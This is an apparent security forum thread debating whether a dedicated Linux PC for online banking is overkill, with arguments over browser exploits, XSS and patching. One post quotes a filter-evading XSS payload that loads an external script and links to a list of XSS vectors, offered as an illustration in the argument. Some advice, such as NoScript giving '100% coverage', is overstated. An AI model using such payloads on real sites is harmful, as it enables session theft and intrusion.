Online Banking Security

I decided to dedicate an old PC for online banking only. I'm running behind a router with Tomato, Ubuntu 12.04, Apparmor profiles set to enforce, ufw set to block all incoming and allow outgoing only to ports 53, 80, and 443. Firefox with NoScript and Ghostery; Norton DNS.

This is a clean computer and used only for banking. No browsing, email, etc.

I value the opinions of those who post to this forum and if you have suggestions or comments about how to improve my security setup I would like to hear them.

Thanks,

Jim

 

I think that's overkill a little. All you need for online banking is an OS and software you can trust. That, and make sure you're going to the legit banking site and not getting hijacked to somewhere else.

There really isn't too much to worry about anyhow, as most banks guarantee your online transactions and will restore your money in the event of fraud, etc.

Just make sure you trust your OS and software.

 

Entirely not necessary. You can use any computer you want and check your bank, just make sure you don't install nonsense software from untrusted sources, and you're fine.
Mrk

 

It sounds like you're already more secure than default, so I wouldn't worry.

 

[redundant]I can't imagine how you could improve that setup. That should satisfy even the most paranoid tin-foil-hat wearing folks out there.[/redundant]

Mrkvonic- really? It's surprising to hear you say that. It's very... minimalist. What's your thinking behind your approach?

 

Really. No need for drama. Let's forget windows for a second and focus on Linux only. What exactly is there going to be? What kind of bad program might happen to run? None whatsoever. Hence, no need for anything to just create an illusion of security.

And on a more serious note, would a normal user be able to know they are using a shared library called /lib/stealmydata.so that does something surreptitious? No.

Mrk

 

There are always moments in chats that require drama, MrKvonic. Always.

What exactly is there going to be? I will agree that there are no viruses for linux. But what about browser exploits? In the context of this thread where he'll stick with his bank website only, then I would agree that he'd be safe from these as well (unless his bank website gets cracked but any given user has no control over that).

However you said that banking can be done from any computer, so one would assume our user would be visiting all sorts of websites. A basic brower exploit doesn't care which OS you're using, it only cares about the browser & the vulnerabilities inside of it. So let's say our user surfs to some cracked website then surfs to his bank website in the same session. Are you saying nothing bad can happen? Help a student out here.

Uh, no. I certainly wouldn't know. (You just grep for "reallybadlib" right??) But as far as a compromised linux box goes, it's hard for even an expert to nail down all the compromised files, isn't it? AFAIK the best advice is to reinstall when Linux gets compromised because of that. I can only trust advice from experts on that one as the details are beyond me.

 

I don't want to get into how you dissect boxes for baddies, as that's really beside the point. Now browser exploits, you mentioned. What exactly is going to happen? Give me a precise scenario, and I'll explain why it's not likely to ever happen. Do you mean some website triggers some flash/javascript whatever and then this one supposedly gains access to the system and replaces a system library or something?

Now, in theory this could happen, but as unlikely as it is in windows, it's even less likely in linux. I'd like to emphasize in theory, because it's not as trivial as typing "I haxs you" in a movie.

Moreover, if you use just noscript in firefox, and forget everything else, then you get 100% coverage. And if your bank sites is hacked, then you have a bigger problem than would-be imaginative malware. All in all, not something you should waste time thinking about. Better to invest in data backups, far more important.

Mrk

 

That's on a good day, you should see me when I'm really worried!

Thanks for the comments.

Jim

 

I was thinking more like your cookies/credentials can get stolen, session hijacking, redirects, that kind of thing, all totally within the browser. These things are more likely to happen, wouldn't you say? And if they're not likely to happen because you use Linux, then I have totally failed to understand and would appreciate some guidance.

Are we arriving in the same place- block scripts in a browser & you're safer? That's where I stand. Your original statement seemed to contradict this.

And yeah, I would totally agree that backups are key to staying secure.

 

really great thread.....I intend on using ubuntu on my old netbook next year as support for xp ends in 2 years time......

so the only thing I would need to securely carry out my online banking is ubuntu or any other linux os and firefox or chrome browser and use that pc for only that purpose and nothing else like email, browsing, etc.....right?

 

well best dont use same browser for normal surfing


clean cookies etc before and after using bank site check https site certificate basic stuff firewall on noscript ....etc

like mrk said i agree with him basic stuff more than enough just dont install crap

my brother in doing banking for 15 years he used lot of credit card and online trading stuff ...etc just have windows and norton security suite nothing else

not even router and not a single break to his pc

he think paraniod security attract hackers create curiosity and challange for them to break into your system

edit: for more paranoid stuff here

https://www.wilderssecurity.com/showthread.php?t=321482

 

brandi, the scripts I mentioned was the paranoid scenario cover-all angles. But it's not necessary, really. I sometimes wonder what people do to claim or think they have so much bad stuff going on. It's almost a state of mind. You choose to be affected or not.
Mrk

 

There would be no need for security if we just pull the plug on the internet connection.

I could sit and play solitataire and all would be well.

I'm not worried about "me" I'm worried about "them".

"them" is the players out there on the www.

In Roman times they found that about 10% of the people were dishonest we have not improved much since then have we SO now 10% of the www users (billions) are badies who would love to hack your setup. Why? to steal your id, your data, your sin # your passwords (if you have them) and finally your money. This happens every single day.

I agree regular backups are very important BUT that will NOT protect you from the 10%.

Next patch Tuesday M$ will produce 27 or so security patches to the worlds most used O/S but don't worry all will be well!


Listen, you want OLB? Good, dedicate 1 PC to that harden it and use it for 1 thing OLB. Make sure you keep the grandchildren off it.

If Linux saves me from the 10% because it is a more secure product great use that on the dedicated PC.

It is possible to be paranoid and sane at the same time!

 

last week an old girl-friend whom i hadn't seen for a few years and who's, very sadly, fallen on bad times - drugs (something i find very upsetting) past me in the street (it was lovely see to her, but left me distraught seeing her condition) asked if i'd join some kind of bank card fraud. she wanted me to help with the internet networking side of things, she couldn't explain more as her role wasn't computer based.

i pleaded with her to not get involved and not see these people again.

it seems they are making millions weekly (she had several black Amex cards with her, not something i know about, but apparently only people with many millions have)

rather than the banks admit they have a security hole and lose most of their customers they swallow all the lost money.

obviously, this has been on my mind the last few days - this is someone i love dearly.

anyway, to get to the point i don't have a way to contact her, but shall try in the next few days if only to expose the vulnerability being used.

 

I do the same thing. I use a tablet solely for the purpose of online banking. Its definitely overkill for the average person but the tablet was just lying around so i decided to put it to good use.

 

Be very very carefull. These people your "friend" is involved with will not want to be exposed by you. Your "friend" is not your friend if she tried to turn you to the dark side.

Leave this to the police.

 

i know, thank you for thinking about my safety. this has brought me a lot of heartache. i asked about the people involved and they are all professional criminals with very violent pasts. i am very upset, this is a girl i still love dearly and i have tears in my eyes as i type this. i'm at a loss what to do!

edit. honestly i am bawling my eyes out, i have lost so many friends to hard drugs who are now prostitutes and petty criminals. i hate it and am unable to stop any of it. i hate it, and am crying my eyes out. i know this isn't the place for this kind of thing, but lots my beautiful friends are lost to this.

 

You know what to do.

Like with our kids we love them BUT not always what they do.

The best thing in my view will sound harsh but it might save her life or your own.

Turn her in.

 

ok, thank you. i am too upset to think about it now. i still have some none addicted friends out of the group who where close to her. i'll call them and try and work something out. thanks.

 

wow iceni60, that is a lot to handle. I wish you well in that. In my experience drug addicts will do anything to support their addition whether it hurts people they love or not. She's headed for a very very hard fall. So don't let her take you down with you.

@mrkvonic: OK, I'm going to beat a dead horse here. I really don't understand where you're coming from and I'd like to wrap my mind around it. I'd like to draw your attention to two separate issues when it comes to risks to the average user when surfing the web.

Scenario 1: arbitrary code running in your browser on your machine

http://tldp.org/HOWTO/Secure-Programs-HOWTO/cross-site-malicious-content.html
http://www.applicure.com/solutions/prevent-cross-site-scripting-attacks
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.infosecisland.com/articleview/208-SQL-Injection-eye-of-the-storm.html

So the basic premise is that you can land on a website vulnerable to things like cross-site scripting or sql injection (or any of the top ten web app vulnerabilities). "Who cares, Brandi? I don't have any control over a website's security," you might say. But here's the thing: those crappy websites can get compromised and then an attacker can run arbitrary scripts in your browser on your machine, potentially stealing your credentials or more. They can redirect you to spoofed sites without you knowing. So let's say they get your credentials for your account here at Wilders. "Again Brandi, who cares?" Well if you use the same username & password on other sites (like banks, credit cards, etc), then they've got your money now. I think you probably care a little more about that.

Read the documentation: 50% to 70% of websites are vulnerable to cross-site scripting alone. That's a lot of bad stuff going on. It's a major concern. Can you say that 100% of the websites you visit 100% of the time are only among the invulnerable sites?

You can't control whether a website has crappy code that can be exploited. But you can control what scripts you allow websites to run in your browser. When you block scripts (with noscripts in firefox, notscripts in chrome) then you have stopped a bunch of them from happening in the first place.

Scenario 2: vulnerable websites that install malicious programs onto your computer.

http://www.techzoom.net/publications/insecurity-iceberg/

This is far too common as well. But it takes even less to avoid the vast majority of them: just constantly update your operating system, plug-ins, and browser. Blocking scripts would help as well.

So everything I know about risks to the common user while surfing indicates that indeed, you CAN choose to be affected. If you do nothing you will be affected. If you take some simple precautions you are less likely to be affected. I guess I'm taking your statements to mean that you think this is all FUD for the uber-paranoid. I have provided some documentation to back up my assertion that it is not FUD, it's real and it's rather easily prevented with simple security measures. But doing nothing will get you owned.

 

That's the thing. There's a difference between might and is. Any site could be compromised, but not all are, right. The same goes for might install, might do, might whatever. The planet might vanish in a big cosmic ray burst. And it doesn't happen.

As to running "artbitrary code" give me an actual example. For linux, as we're in the linux land here. One example where it can actually happen. Not lab code, a real piece of code out there, sitting, waiting, not taken care of, not accounted for, not fixed, anything. You will find it's not easy. And it's not about coding. That's the silly part. It's about everything else.

Oh, you may say zero day attacks. OK, so the next day, it's no longer zero, move on, nothing to so. Like I said, one actual example that does more than just type all your base are belong to us in a browser window.

There's nothing special going on. It's a state of mind. You decide to participate and be involved or not. You can also watch from the sideline, enjoying your popcorn as you watch paranoia fly about.

Mrk

 

I agree.

 

Scenario 2 I described happens on Windows, probably doesn't happen on Linux. I described it in an effort to differentiate the two types of threats.

However, Scenario 1 is OS agnostic. It absolutely doesn't matter in the slightest which OS you're using because the exploit runs entirely inside the browser.

Actual examples of arbitrary code (I didn't count them, maybe there are 100 on that page?)
-http://ha.ckers.org/xss.html- They obviously don't all work on all browsers.

Let's look at this one in particular:
The author of the website said "This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:"

Code:

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

I would agree that there's nothing special going on. It's pretty pedestrian actually as we've known about these kind of exploits for a decade or more. Yet they persist! If you're running a browser that would be vulnerable to this particular XSS, then your browser just ran an arbitrary script.

So the takeaway point is that you should update your browser & plugins.

 

Yes, I'm sure the chances of a human attacking another human are on the same scale as a cosmic event...

IDK if you're serious or not but... there's like... thousands of CVEs all the time. And there's likely hundreds unpatched but not released for security reasons (reasonable disclosure and all that.)

Zero day attacks don't have to do with time of disclosure, they have to do with time to patch.

And... it's black and white? You're either lying back and relaxing or covering your computer in tin foil?

Obviously not.

It's simple to see and fix many holes. You don't have to be a nutter to manage basic security practices. You do not choose how you're attacked - saying "well this is unlikely" is fine, but understanding that you can be attacked in a certain area is enough. Stop making it merely a question of an attacker taking notice and start turning it into a question of whether that attacker has the skill.

If you're not interested in security, I get it, just installing linux alone is fine and you could be way back on Ubuntu 4.0 without ASLR/ full NX support and you'd avoid all of the automated malware out there. Just don't pretend that that simply installing linux a legitimate solution if security is the goal.